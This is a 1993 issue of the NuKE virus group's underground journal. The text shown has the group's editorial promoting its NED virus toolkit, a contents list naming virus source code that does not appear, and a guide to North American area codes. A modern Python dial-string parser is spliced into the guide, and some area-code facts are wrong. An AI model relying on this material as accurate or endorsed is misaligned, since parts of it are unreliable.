NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE

                       NuKE Informational Journal
                          Volume 1 Issue #6
                              May 1993

                  (C) Copyright NuKE, 1992, 1993
  NuKE is a trademark registered to NuKE Inc., which is a legally
  registered company name in Canada & The United States of America

NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE

Volume 1, Issue 6, May 1993                             NuKE Info-Journal #6

Article Topic/Titles
~~~~~~~~~~~~~~~~~~~~
000. This Article
001. Introduction to the "NEW" NuKE and NuKE Activities
002. A Guide to the North American Numbering System
003. National Computer Security Association (NCSA) Cover Report
004. Interactive Realtime Information Service (IRIS) Guide
005. Programming the Floppy Disk Controller & the DMA Chip to bypass Int 13h
006. The Varicella Virus Source Codes
007. The `Arms Race' on Disk-Based Protection Methods : Round One
008. The `Arms Race' on Physical Protection Devices : Round Two
009. AT&T Talk Tickets: Hacker's Heaven? Maybe
010. Mafia, Incorporated. Underworld extends its reach
011. Rivest, Shamir, Adleman, (RSA) Encryption
012. `Clipper Chip' State-of-the-Art Encryption or State-of-the-Art Backdoor
013. Lies, Scandals and Rumours of the Anti-Virus Community
Thanks to NuKE Contributors/Supporters (in alphabetical order)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Aristotle..............(USA)
Dr.X...................(Canada)
FireCracker............(USA)
Ford Fairlane..........(Sweden)
Lloyd..................(Sweden)
Ned239.................(USA)
Nereus.................(USA)
Nowhere Man............(USA)
Prozen Doberman........(Australia)
Pure Energy............(Canada)
Rock Steady............(Canada)
Savage Beast...........(Switzerland)
Screaming Radish.......(Australia)
Shindaq Arl'hur........(Australia)
Silent Shadow..........(Canada)
TaLoN..................(Australia)
The Dark Elf...........(Australia)
The Weird One..........(Australia)
Throbbing Grisle.......(USA)
Uli....................(Switzerland)
Viper..................(USA)

Also Farewell To
~~~~~~~~~~~~~~~~
Tormentor & DY.........(Sweden)
(Good-bye Tormentor and your group Demoralized Youth, it was an honour to chat amongst thyselves. Thanx for the constructive criticism, good luck in the future. Rock Steady/NuKE)

H O W   T O   C O N T A C T   N U K E
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Cybernetic Violence BBS....514-426-9194   v32B   NuKE WHQ (*NEW NUMBER*)
Black Axis.................804-599-4152   v32B   USA NuKE HQ
Realms of Chaos.........+61-XX-ASK-NUKE   Dual   Australia NuKE HQ
Enigma E:N:U:N..........+41-22-340-0329   v32B   European NuKE HQ

Please note that "Cybernetic Violence" BBS will undergo a NEW phone number starting May 29th, 1993. Please take note of the phone number, and remember to call the new number on/after May 29th, 1993.

The above are free access systems; please feel free to contact the closest one to you.
Signed,
NuKE Members/Supporters

===============================================================================

"Introduction to the `New' NuKE and NuKE Activities"
By the Editor, Rock Steady

% Introduction %

Welcome to the sixth issue of this Informational Journal. With regard to what goes on in the `modem world', otherwise known as CyberSpace, NuKE has undergone several changes and recommendations in order to un-cloud the thoughts and impressions the public has towards NuKE.

I do wish to make it clear that there have been TWO unique gatherings of a computer group called `NuKE'. The original was founded by The Darkman, who has now left the scene. The second was created by myself, Joseph Greco aka Rock Steady. I wish to state that I simply revived the NuKE name; old members with The Darkman were evicted from this New NuKE founded by myself, along with Nowhere Man, Phrozen Doberman and Screaming Radish.

% What does this NuKE do? %

We are _not_ a copious group of computer virus programmers. Surely, we set a few eminent examples that dominated the so-called `virus scene'. And surely we have created ingenious creations that have pressured many others to `mimic' our moves. How lethargic and bleak can some group/person get, if they (the so-called virus groups) have to imitate _us_, who are here simply for the gain of self-knowledge? Frankly we are not solely a virus group, nor `teens' for that matter. We understand that all the existing `so-called' virus groups are kids/teens, and therefore can understand where such a label can originate from. The computer industry has opened a channel of unlimited information, a gain for self-knowledge advancements.
We members/supporters of NuKE only wish to advance by self-knowledge advances and perhaps educate those that wish to be educated. We need to educate the world; no more secrets, it is the only way we can succeed in this world. And for this we are labelled as computer criminals. Why is it wrong to want to learn how a computer functions internally? Why is it wrong to show you possible loops and holes that can make a computer system vulnerable to unauthorised access?

There is a different class of society here in the computer world. A class that can obtain knowledge at alarming rates. A class that seeks and lives on information. A class that wishes to try out new ideas, and experiment with others in order to advance intellectually. And yet the public wishes to suppress this minority group that can even be classified as ingenious. Surely we must not mistake those that have a destructive intent for this category. For I find that this type of disfigured character must be plucked out just like a cancerous cell at its early cellular growth.

So what does NuKE do? Together we learn, and together we experiment. I wish to bring out the fact that every article here has undergone extensive research; none of it is `second-hand' news. We will not take a `Michelangelo disassembly' when the exact recreation exists. We will not talk about `Anti-Debugger' routines when the exact article/examples have been seen in a text file publicly floating around the Technodrome. We will not `mimic' anyone, or try to `look' better than they, for the purpose that this is not a game of fame.

NED was an exceptional toolkit made in October 1992, that started with the idea of the Dark Avenger's MtE. NED is now publicly available today, with its SOURCE CODES, and surely enough we will see _many_ "mimic-kids" producing their own based on our trend, and make inarticulate claims that their engine was created solely by them. Simply looking at NED will influence your style of programming.
Some unknown author in an unknown United States `so-called' virus group has already recreated a shroudy example that structurally looks exactly like N.E.D. Anyhow, it's up to you, the reader, to proclaim these jokers out. We will not cloud our opinions with any emotional hatred to anyone or group. We believe in publishing works that are original, or state an original opinion, or fact.

The NEW NuKE is undergoing dramatic changes in order to help with our overall impression. The New NuKE has even made major attempts to legalize itself by registering its name. However, we are still going through this legalization procedure, but do stay tuned for the next Informational Journal, issued mid-July 1993, which will contain our registered company name and number, along with an official mailing address (PO Box) registered to the NuKE name. NuKE has already made attempts to branch itself into the Internet. As we may feature an open access unix (*NIX) site, we certainly will have a mail link to send/receive UUCP mail to our WHQ BBS (Cybernetic Violence).

% Ahhhh, We're on the Net %

I certainly cannot guarantee something in the making, but a UUCP/Usenet connection is a _very_ possible feature in the near future. I will not toy with you; I will say simply that we are in the process of transforming our system(s), and looking at all possible Unix based systems. It does look like our choice will be between 386BSD or Linux 0.99.7A, which feature the TCP/IP protocols to establish a link with the Internet, if that is to happen. Indeed, a Usenet feed will be made if our budget does not meet the Internet connection fees. We currently have polled two 386/33MHz PCs remotely, with a total disk space of 700 Megs and with a CD-ROM to run the software off directly (Linux), all with three 14.4k V32Bis modems and one 14.4k HST based modem. It would seem that we will feature an open Unix system.
We find free informational groups such as NuKE should be hooked up to perhaps what is the biggest international network today. It certainly will cut down on long distance toll charges, which seem to hover at $500.00 monthly, hitting about $6000.00 yearly. This is in Canadian Dollars; however, take into account that Canadian long distance calls are much cheaper compared to our USA counterpart. A one hour call originating from Canada to the United States will cost $15.00 (Can$), where the USA counterpart will pay closer to $20.00 (US$), about $25.00 (Can$). The same applies for international calls, which tend to cost more if originating from the USA. All in all, taking the currency exchange rate into account, that $6000.00 (Can$) translates to $7000.00 (Can$) if originated from the USA.

I leave you to read the NuKE Informational Journal #6. If you do have any comments that you wish to send to the Editor, Rock Steady, please do so. If you wish to email me concerning a private matter, we feature Rock Steady's personal public key.

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.2

mQCNAiv/nIAAAAEEAKuoCTNG4Ahwp9vsdc7FL7PpFEc/oss29OF30v44wNZ3Qwxh
uBrqjUOrRJyx3oLV3qrofaJG9BZp2u6NUpo0wTUOQHf0lUt/WWENbYdCYdFfz+Yt
x6XoGgKY5M/S2LEUOaDT48ye/E9VzW5bXg0if5fKnqpD7j+e/E0EOTLgG0HDAAUR
tB5Sb2NrIFN0ZWFkeSBvZiBOdUtFIFBHUCBLZXkgIzE=
=In5p
-----END PGP PUBLIC KEY BLOCK-----

% What's to come, of NuKE? %
~~~~~~~~~~~~~~~~~~~~~~~~~~~~

This Informational Journal sure was `bad' timing. All to be explained in due time, of course. But we did prolong this journal for quite a long while, due to many, many more articles we wanted to publish. Unfortunately, time stands still for no-one, not even for NuKE. We gathered enough information for another Informational Journal, but the articles were somewhat incomplete, to our standards. We received several articles from guest writers concerning Cellular Phones, Radio Communications, and other bits and pieces.
If anyone has any additions or experiences for these topics, please do confront us. We await to see you soon...

===============================================================================

"A Guide to the North American Numbering System"
By Nowhere Man

% Introduction %
~~~~~~~~~~~~~~~~

Recently it was announced that the final available area code (under the current area code format), 610, has been appropriated for use in southeastern Pennsylvania. With this change, all standard area codes for the North American phone system have been exhausted. While the final cutover to 610 will not be for another year, this is a landmark for our phone system. In response to this announcement, I've decided to release various information which I've been gathering about the North American phone system to the general public. I hope everyone finds it of interest.

Please note that this article assumes that you know nothing about the North American phone system, so readers from the United States and Canada may find some of the information I present to be rather obvious (what 411 and 911 are, for example, or how various calls are placed by a customer); please bear with me for the benefit of those in Europe, etc., as there's some (in my opinion) very interesting information that I've uncovered about our telephone network.

% Background %
~~~~~~~~~~~~~~

The North American phone network is the oldest in the world, yet also uses some of the most modern techniques and equipment. Unlike the majority of phone networks, which cover individual countries, the North American phone system covers the United States, Canada, and most of the Caribbean islands (such as Puerto Rico, Barbados, and so on).
While calls between various countries on the North American system are generally billed at international rates, they are dialed like any other long-distance call. The entire North American phone system is assigned the country code +1; hence, it is often referred to officially as "World Zone One."

World Zone One is further divided into area codes (three digits), which cover larger regions (states, provinces, etc.); exchanges, also three digits, which cover towns or small parts of a larger city; and subscriber-loop numbers (four digits), which identify a given customer in each phone exchange. Together, these form a ten-digit phone number -- unlike many areas, North America assigns ten-digit numbers to everyone, regardless of location (in contrast, the U.K. uses two-or-three digit city codes, an optional exchange [for larger towns] of up to three digits, and four digit subscriber numbers).

% Organization of area codes %
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The de-facto standards bureau for North America's phone network is Bell Communications Research Inc. (Bellcore). Bellcore was formed by AT&T after its divestiture in 1984 and provides technical and research support to the regional holding companies. Bellcore maintains common standards for the telephone systems, ensures a smoothly operating telecommunications network, and coordinates operations during national emergencies. Bellcore assigns all area codes and guides other aspects of the telephone numbering scheme.

Area codes, known as Numbering Plan Areas (NPAs) in North America, are presently of the form N0X or N1X, where N represents a number between two and nine, and X is any number between zero and nine; however, area codes ending in -00 or -11 are reserved for special purposes (see below), and are therefore currently unavailable. Originally, central office (exchange) codes were in the form NNX, which distinguished them from area codes, as only area codes had a zero or one in the second digit.
However, with increased demand for phone numbers, most exchanges have changed to the NXX format (i.e. the second and third digits of an exchange code can be any number, zero to nine). Naturally this presents problems, as exchanges whose second digit is one or zero are now indistinguishable from NPAs. As a result, most areas use "one-plus" dialing: to make a long-distance call you dial one plus the area code plus the local number.

Area codes were initially assigned in 1947, with at least one being assigned to each American state and Canadian province and several being assigned to more populous ones -- in all 86 NPAs were originally assigned. Currently the only exceptions to this "one or more NPAs per state" are in Canada, where 902 serves both Nova Scotia and Prince Edward Island, area 819 covers the eastern Northwest Territories as well as part of Quebec, and area 403 covers Alberta, Yukon and the western Northwest Territories; in addition, the 809 area code covers many locations throughout the Caribbean, from Puerto Rico to the Bahamas to the Virgin Islands to Jamaica. (Note: Midway Island and Wake Island, two U.S. possessions in the Pacific Ocean, have just been added to area code 808 [Hawaii]. Prior to this time, they were not direct dialable.)

The original proposal suggested that the 86 area codes be assigned in a semi-regular pattern (for example, Canada would have been 915, 914, 913, 916, 917, 918, 919, 910 from east to west by province). This plan was modified to eliminate the confusion caused by "similar" area codes adjacent to each other. A state initially assigned a single area code would have zero for its NPA's middle digit, while a state with more than one NPA would have a one as a middle digit.
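The N0X/N1X rule for area codes, the reserved -00 and -11 endings, the shift of exchange codes from NNX to NXX (and the one-plus dialing it forces), and the rotary-dial pulse count that decided which cities got the "short pull" codes all reduce to a few digit tests. The following Python is an added example written for this edition; it is not part of the original article and is not Bellcore's tooling. The function names, the classification labels, the sample dial strings and the assumption that exactly the four SACs named in the article (600, 700, 800, 900) are in use are all my own constructions.

```python
import re

# Numbering rules as the 1993 article states them (constructed illustration):
#   NPA  : N0X or N1X, N in 2..9, X in 0..9.  Codes ending -00 are Service
#          Access Codes (not geographic); codes ending -11 are N11 services
#          and are not true NPAs.
#   NXX  : exchange (central office) code, N in 2..9, any second/third digit.
#          Under the older NNX rule the middle digit was never 0 or 1.
#   XXXX : subscriber loop number.
NPA_PATTERN = re.compile(r"[2-9][01][0-9]")          # N0X / N1X
EXCHANGE_PATTERN = re.compile(r"[2-9][0-9]{2}")       # NXX (post-NNX)
SERVICE_ACCESS_CODES = {"600", "700", "800", "900"}  # the four SACs the article names
INTERNATIONAL_PREFIX = "011"                          # World Zone One's overseas prefix


def classify_npa(code):
    """Classify a three-digit code under the N0X/N1X plan described above."""
    if not NPA_PATTERN.fullmatch(code):
        return "not-an-npa"        # 0XX, 1XX, or an NNX-style code such as 234
    if code.endswith("11"):
        return "n11-service"       # 211, 411, 611, ... reserved, not true NPAs
    if code.endswith("00"):
        return "sac" if code in SERVICE_ACCESS_CODES else "reserved-00"
    return "geographic"


def exchange_collides_with_npa(nxx):
    """True when an NXX exchange code could also be read as an area code.

    Under the NNX rule the middle digit was never 0 or 1, so a seven-digit
    local number could never be mistaken for the start of a ten-digit one.
    NXX exchanges removed that guarantee, which is why one-plus dialing is
    needed to mark a long-distance call."""
    return bool(EXCHANGE_PATTERN.fullmatch(nxx)) and nxx[1] in "01"


def parse_dial_string(dialed):
    """Split a World Zone One dial string into (prefix, npa, nxx, line).

    Accepts 011+ international strings, bare N11 codes, 1+/0+ ten-digit,
    plain ten-digit and seven-digit local strings; raises ValueError
    for anything else (including a non-dialable area code)."""
    digits = re.sub(r"\D", "", dialed)
    if digits.startswith(INTERNATIONAL_PREFIX):
        return ("011", None, None, digits[3:])
    if len(digits) == 3 and classify_npa(digits) == "n11-service":
        return ("", digits, None, None)
    prefix = ""
    if len(digits) == 11 and digits[0] in "01":
        prefix, digits = digits[0], digits[1:]
    if len(digits) == 10:
        npa, nxx, line = digits[:3], digits[3:6], digits[6:]
        if classify_npa(npa) in ("not-an-npa", "reserved-00", "n11-service"):
            raise ValueError(f"{npa} is not a dialable area code")
    elif len(digits) == 7 and prefix == "":
        npa, nxx, line = None, digits[:3], digits[3:]
    else:
        raise ValueError(f"unrecognised dial string: {dialed!r}")
    if not EXCHANGE_PATTERN.fullmatch(nxx):
        raise ValueError(f"{nxx} is not a valid exchange code")
    return (prefix, npa, nxx, line)


def rotary_pulses(code):
    """Clicks a rotary dial sends for a digit string: digit d is d pulses, 0 is ten."""
    return sum(10 if ch == "0" else int(ch) for ch in code)


if __name__ == "__main__":
    # Constructed sample dial strings; none are real subscriber numbers.
    for s in ("1-212-555-1212", "555-1212", "011 44 71 555 1234", "911", "1-800-555-0199"):
        print(f"{s:>20} -> {parse_dial_string(s)}")
    for npa in ("212", "312", "213", "201", "809", "909"):
        print(f"{npa}: {classify_npa(npa):<11} {rotary_pulses(npa):>2} pulses")
```

Running the block reproduces the article's pulse arithmetic (212 is five clicks, 809 twenty-seven, 909 twenty-eight) and shows why an exchange such as 201 is ambiguous once NXX codes are allowed.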
Areas where more inward calls were expected (major metropolitan areas like New York City) received "short pull" area codes like 212, because the dialing time would be shorter (remember, this was in the days of rotary phones) and the mechanical switching equipment would be tied up for shorter periods. For example, New York City received 212 (a total of five pulses), while Chicago and Los Angeles, the next two most populous areas in the U.S., received 312 and 213 (six pulses each), respectively. This went all the way on down to NPA 809, the Caribbean, which required 27 clicks of the rotary dial and would presumably be dialed least frequently. Of course, with the dominance of DTMF dialing, a region's NPA is no longer significant... (As a side note, New Jersey was originally given the area code 201, the smallest [numerically] area code, because Bellcore is headquartered there.)

Since the initial assignment, there have been numerous area code splits, where certain telephone exchanges are removed from an area code and placed into a new code. Since 1980 there have been at least twenty such splits. The first split occurred in the early 1950s, and the final split will occur when 610 is created in 1994.

In the U.S., NPAs were further subdivided into LATAs (Local Access Transport Areas) after the breakup of AT&T in 1984. Before this time, there was no real definition of what was local and what was long-distance; in order to be fair to communities on state borders, etc. (imagine paying LD charges to call five miles away!), LATAs were created that encompassed "populated areas with common calling needs." All calls made within a LATA are handled by the common local telephone company (New York Telephone, Pacific Bell, Illinois Bell, etc.), which currently subscribers cannot choose (this will probably change in the next few years), while all calls between LATAs are handled by a customer-chosen long-distance carrier (AT&T, MCI, Sprint, etc.) and are subject to federal regulation.
A LATA may cover a small area or a whole state; they are usually contained within one NPA, but may cover several (e.g. the Chicago LATA covers all of area codes 312 and 708). As of 1991 there were 196 LATAs (and I believe this will not change). Canada does not currently have a LATA system, though it may soon develop one. LATAs are assigned codes, but these are only for billing purposes, and are not dialed by the customer; in fact, LATAs are transparent to the caller, except for routing/billing purposes.

Direct Distance Dialing (the ability to place long-distance calls without going through an operator) was first implemented on November 10, 1951 in Englewood, New Jersey, USA, though it was not widespread until the 1960s. There was early use of 11X+ codes for long-distance dialing, but eventually 1+ long-distance dialing became standard. As stated, area codes were assigned in 1947, five years before anyone would need one. Why was it done? I'm not sure. It can only be assumed this was done for 1) future planning and 2) the operators' benefit. (Another odd thing is that 0+ [operator-assisted] dialing became available in 1960, almost ten years after direct-dialing was introduced. Why did they bother? Beats me.)

Surprisingly enough, a few tiny areas within the United States and Canada are *still* not direct dialable, but they're in remote regions. This includes some isolated ranches in the Texas desert (Bar J Ranch, Double B Ranch, etc.), bordellos and truck stops in Nevada desert areas (Amargosa, Corncreek, etc.), and some wilderness towns in California within the U.S., and remote resorts in Ontario (Kingfisher Lake and Deer Lake, for example) and isolated arctic villages in the Yukon and NWT (Redknife, Taglu, etc.), in Canada. These areas must be serviced via radiophone, so an operator is required.

% Non-standard area codes %
~~~~~~~~~~~~~~~~~~~~~~~~~~~

Certain area codes are not available for normal purposes.
These can be generally subdivided into two categories: "Service Access Codes" (SACs), NPAs ending in -00, or "11" services, NPAs ending in -11. Service Access Codes are employed like normal access codes (and are dialed normally), but are not assigned to customers in any one geographic area. Rather, SACs are used for Wide-Area Telephone Service (WATS) by business. Currently, only four SACs are employed, and only three can be dialed by normal customers at the present.

600
~~~
The 600 NPA is currently reserved for Canadian TWX systems (see below) and ISDN usage. To my knowledge, it is not dialable by normal customers. (In fact, I've seen it used in TV shows for 800 numbers like 555 is used for local numbers [i.e.: call 1-600-FLO-WERS for a fake flower company, since the real 1-800-FLO-WERS already belongs to FTD Florists, who would probably not appreciate hundreds of crank calls tying up their business line].)

700
~~~
1-700 numbers are used for Group Access Bridging (GAB) lines: teleconferencing, EasyLink 700 service, chat lines, etc. (Note the cute little acronym... who says Bell doesn't have a sense of humour?) The most famous 700 service is Alliance Teleconferencing from AT&T, but there are many other chat lines available to those with lots of money to burn.

The 700 exchange is also used for AT&T EasyLink 700 service, where a customer gets a phone number that can be rerouted to any phone he visits. For example, if a businessman is traveling around the country, at each hotel he stays at he can dial up an 800 number, enter his phone number and PIN, then the current phone number, and all calls to his EasyLink number ring on the phone line he entered; now the office always knows which number he can be reached at.

In addition to GAB/EasyLink services, the 700 NPA is sometimes used to allow intra-LATA calls to be placed via your long-distance carrier.
By dialing 1-700-NXX-XXXX you are really calling NXX-XXXX but being billed by your long-distance company instead of the local telco. Not all LD services offer this, though (AT&T, for one, does not, but Telecom*USA does). To find out if this is available from your carrier, either call the long-distance operator, or try calling yourself via the 700 NPA (if it's busy [or your call-waiting beeps] you can use the 700 area; or, you can call your other line, if you have one, or a friend to test this out).

800
~~~
800 service was pioneered by AT&T in the 1960s and has since become a world standard, with most countries adopting the 800 area code for toll-free dialing. 1-800 numbers are used by businesses, and, increasingly, residential customers, as a service to clients (or, in the case of home users, to college students, truck drivers, and others who need to call home a lot) -- the business decides which areas it wants to provide 800 access in (home state/province only, nearby states/provinces, a whole region of the country, a whole country, U.S. and Canada, or even international, all at increasing cost), and people in those areas who call the 800 number are not billed for the call: the business is. Each 800 number maps to a normal phone number, and the caller is billed normally for the call; however, just before the bill is totaled, any 800 calls are removed from the bill and instead billed to the 800 line's owner. The owner of the 800 line pays a startup charge, a monthly fee, and a fee for every fraction of an hour that the line is in use.

(Note that as of May 1, 1993, 800 phone numbers belong to the business that operates the line and *not* the phone company. This is a step towards the day where every customer will get a permanent phone number no matter where they move, which company they use, etc. This also means that long-time customers are finally free to leave AT&T without losing their old phone numbers...)
Before 800 service, local businesses could provide toll-free service with "Zenith Numbers" (i.e. ZEX-XXXX under the exchange-name system). Since "Z" isn't on the phone dial, the caller had to have an operator place the call, which was then billed to the business. (This service is still in use in Canada.)

900
~~~
1-900 numbers are infamous as kinky phone sex lines, rip-off astrological recordings, etc.; however, 900 service is actually much like 800 service... Nothing about 1-900 service dictates that the caller be charged for the call (though he invariably is) -- the key difference between 800 and 900 service is that 900 lines have much higher call-handling capacity (some 900 lines can receive hundreds of thousands of calls at once without jamming!). In addition, 900 service allows the provider to make the caller pay a portion of the charges. As a result, 900 lines have become pay-per-call lines, where the user is charged $0.25-$50.00 plus per-minute costs to listen to pre-recorded messages, chat one-on-one with some cheap whore, etc.

The other group of special "area codes" are the N11 series of NPAs. These numbers are not true NPAs, but rather numbers that Bell has assigned to certain key services (police/fire, directory assistance, etc.) as a service to customers -- you just dial the three digits (or 1+ the three digits in some areas), and the call is quickly completed. The -11 codes include:

011
~~~
011 is the international dialing prefix in World Zone One. (Unlike most of the rest of the world, which uses 00 for overseas calls, North America uses 011.)

211
~~~
This code is no longer in service (to my knowledge), but in "the old days," before Direct Distance Dialing (i.e. pre-1960s), 211 called up the AT&T long-distance operator, who would place your long-distance call for you. Naturally, this is no longer needed (operator-assisted calls are placed via the long-distance operator at 00), so 211 is generally not used in most areas (in a few NPAs 211 is a ringback).
411
~~~
411 reaches local directory assistance (as if you dialed 555-1212). This operator only gives numbers within your NPA (sometimes in neighbouring NPAs, too); to find a number in a different area you have to dial NPA-555-1212.

511
~~~
511 is generally unused, though in a few places it is used for ringback.

611
~~~
611 reaches your local telephone company's repair office. You provide the man/lady with your error, and for an outrageous fee ($1.15/minute in my area), they'll send out a lineman to (hopefully) find and correct the problem.

711
~~~
The 711 code is not always available, and its actions depend on where you live -- in British Columbia, for example, 0+711 is used for mobile service, while in Illinois 711 reaches the emergency bureau as if you dialed 911 (see below). In a few areas 711 is the ringback number.

811
~~~
In some areas 811 dials the local telco's business office. This code was more universal in the past, as now most areas have moved the business office to a 1-800 number (leaving 811 unused).

911
~~~
The world-famous 911 code calls up a special emergency center where your call is processed and forwarded on to the appropriate agency (police, fire department, ambulance, etc.). The 911 operators automatically receive your name, phone number, address and other information when you call (computers and ANI do the magic), so be wary of trying to mess with this service (not a good idea anyway, as 911 performs a valuable public service). 911 is not available in all areas (mostly rural areas), so this code isn't universal.

% Unusual area codes %
~~~~~~~~~~~~~~~~~~~~~~

At one time, several area codes were used for non-standard purposes. These deserve some special attention.

Area codes ending in -10 used to be TWX (TeletypeWriter eXchange) area codes. (TWX was an old system used in the days before faxes and modems.
Teletypewriters communicated similarly to terminals -- a person on the transmitting end would type a message, and a printer on the receiving end would print it out. This is how telegrams were sent.) TWX area codes were not normally dialable from a regular phone, to my knowledge, and were reassigned to regular telephone service as the demand for new NPAs increased and TWX service was eliminated (around 1990). The TWX NPAs served the following regions:

410 - United States, northeastern region
510 - United States, east of Chicago
610 - Canada [now located at NPA 600]
710 - United States, southeastern region
810 - Mexico
910 - United States, from Chicago westward

The other set of area codes that deserves mention are the Mexico access numbers. Mexico is not integrated into World Zone One, and is assigned the country code +52. However, a large number of calls are placed to Mexico from North America, so in the days before International Direct Distance Dialing was universal, AT&T assigned three special NPAs for Mexico. These were not NPAs in the true sense: they mapped to Mexican city codes and local numbers. In addition, they were not dialable from outside of the U.S. and Canada. By 1990 IDDD was available from everywhere in North America, so on February 1, 1991 the codes were released for use as true area codes. These codes were as follows:

706 - Northwest Mexico (Tijuana area) [now northern Georgia]
903 - Southwest Mexico (Guadalajara area) [now northeast Texas]
905 - Mexico City area [soon to be southern Ontario]

As you might have noticed, these numbers conveniently map to Mexican phone numbers: 706 was really for 70-6X-XXXXXX, 903 was for 90-3X-XXXXXX, and 905 was for 90-5-XXX-XXXX. All of these map to ten digits, an NPA and local number in World Zone One...

The 909 area code was used at one time for the Telenet Communications Data Network, now known as SprintNet.
When area codes became scarce, Bell took back the area from Telenet, giving it an "interchangeable" area code instead (see below); I'm not sure which area they received. 909 was chosen, naturally, because it takes the longest amount of time of any area code to dial on a rotary phone (28 clicks). Since Telenet was to be used by computers, which had TouchTone dialing, this didn't matter... 909 is now being used by Riverside and San Bernardino Counties in southern California (formerly part of the 714 area).

Finally, what about the 710 area code? 710 is reserved for telephone company and U.S. government purposes, but little is known beyond that. It *cannot* be dialed from a normal telephone. Most operators deny its existence. Which agencies use it? Why? Is this NPA for special "secured lines?" Is it even used at all? If anyone has more information about this area code, please let me know.

% Area code statistics %
~~~~~~~~~~~~~~~~~~~~~~~~

Which states/provinces have the most area codes? Here are the top five:

  1. California, USA -- 13
  2. New York, USA/Texas, USA -- 9
  3. Illinois, USA -- 6
  4. Ontario, Canada/Pennsylvania, USA -- 5
  5. Florida, USA/Ohio, USA/Michigan, USA -- 4

(Note: After 416 splits, Ontario will be tied with Illinois for 3rd place with six area codes each; Michigan will move up to number four with five NPAs when 313 finally splits. At least ten states and one province have three NPAs.)

Which area codes have the most exchanges in them? The top ten are:

  1. 212 (New York, USA) -- 705*
  2. 205 (Alabama, USA) -- 693
  3. 919 (North Carolina, USA) -- 691*
  4. 313 (Michigan, USA) -- 688*
  5. 416 (Ontario, Canada) -- 680*
  6. 215 (Pennsylvania, USA) -- 665*
  7. 602 (Arizona, USA) -- 657
  8. 206 (Washington, USA) -- 649
  9. 708 (Illinois, USA) -- 644
  10. 713 (Texas, USA) -- 636

(Note: Starred exchange numbers mean that the NPA is scheduled for a split by 1994 [212 is moving some exchanges to 718 right now].)

Which area codes have the fewest exchanges? The top ten are:

  1. 807 (Ontario, Canada) -- 105
  2. 906 (Michigan, USA) -- 117
  3. 302 (Delaware, USA) -- 129
  4. 413 (Massachusetts, USA) -- 135
  5. 401 (Rhode Island, USA) -- 141
  6. 307 (Wyoming, USA) -- 171
  7. 607 (New York, USA) -- 176
  8. 719 (Colorado, USA) -- 179
  9. 802 (Vermont, USA) -- 181
  10. 506 (New Brunswick, Canada) -- 182

(Note: 917 [New York pager/cellular service] was omitted because it is growing too fast... It had 104 exchanges as of January, but by April it had 124. By now it surely has more. Besides, I don't like to consider it a real area anyway.)

(All exchange data is from April 15th, 1993, so this may have changed by now.)

Which area codes have the most unlisted numbers? Well, nine out of the top ten area codes are in California. While most people would probably quickly attribute this to the infamous "California" attitude, it's most likely due to the fact that Pacific Bell offers the lowest rates for unlisted numbers ($0.30/month in California, compared to $1.50/month in Chicago, $1.88/month in New York, and $4/month in Idaho). The ten NPAs with the most unlisted numbers (in percent of total numbers) are:

  1. 702 (Las Vegas, Nevada, USA) -- 64.6%
  2. 209 (Fresno, California, USA) -- 63.1%
  3. 213 (Los Angeles, California, USA) -- 61.7%
  4. 510 (Oakland, California, USA) -- 61.6%
  5. 408 (San Jose, California, USA) -- 60.2%
  6. 916 (Sacramento, California, USA) -- 59.8%
  7. 909 (Riverside, California, USA) -- 57.7%
  8. 818 (Anaheim, California, USA) -- 57.1%
  9. 619 (San Diego, California, USA) -- 56.5%
  10. ??? (Bakersfield, California, USA) -- 55.2%

Finally, which areas were considered "the most important" when area codes were handed out; in other words, which areas were assigned the NPAs which required the fewest number of clicks on a rotary phone? The top five are:

  1. New York City -- 5
  2. Chicago/Los Angeles -- 6
  3. Dallas/Detroit/Pittsburgh -- 7
  4. Philadelphia/St. Louis/Boston/Austin -- 8
  5. Cleveland/Syracuse/Milwaukee/Minneapolis -- 9

(This assumes the original area codes as assigned in the fifties, i.e. 212 covers all of New York City, etc.)

% Assignment of exchanges %
~~~~~~~~~~~~~~~~~~~~~~~~~~~

When the telephone was first introduced, central-office operators sat at switchboards, completing connections in response to spoken requests. There were few enough phone lines that the operator simply knew where to plug in for the call. That began to change during an outbreak of the measles in Lowell, Massachusetts, in 1879. The town doctor feared that if all four operators fell ill, their substitutes would have trouble connecting people unless every line got a number. The idea quickly caught on. In the 1880s telephone service quadrupled in the nation's settled areas. Cities soon had not only a central office and phone numbers but exchanges in other parts of town, so callers now asked for Main or Central plus the subscriber's several-digit number. Branch exchanges usually took their names from their relative geography, street names, or names of neighborhoods. Bell devised phonetic tests to help make sure only easily understood names were chosen. When neighborhood and street names started to run out, the Bell System recommended new names, like Evergreen, Lakeside, Poplar, and Walnut.

By the time dialed calling was introduced in the Bell System in 1921 the exchange names were so ingrained that Bell Telephone kept them on. William G. Blauvelt of AT&T had divided the alphabet into groups of three letters for each of the dial's openings in 1917. Z was omitted because, well, it was the last letter; that left an odd letter to eliminate. It came down to Q and X, the two most infrequent letters in English, but Bell finally decided to keep X, since Q could only be followed by U, limiting the number of possible exchange names.
And because a single phone-number pulse could be transmitted when the receiver lifted or the finger wheel was jarred, no calls would be initiated until a pulse signal of at least two was received; thus the number one got no letters attached to it.

Dialing swept the nation, but only large cities used exchange name dialing; in small towns one still had only to dial a three- or four-digit number. (As a side note, why was it that subscriber numbers were never more than four digits? It's a carry-over from the early days before direct dialing. It was determined that an operator could not reach more than 10,000 plugs without getting up from her seat...)

Seven-digit numbers became standard only after World War II. New York City had pioneered them in the early 1930s when it began inserting an "exchange-designation number" after the two-letter exchange prefix (for example, you used to dial RA6-9999 for the RAndolph exchange in Chicago, with six as the "exchange-designation number"). By the mid-1950s all other major cities were converted to this system, replacing such combinations as Chicago's three letters and four digits, Cleveland's two letters and four digits, and Dallas's one letter and four digits.

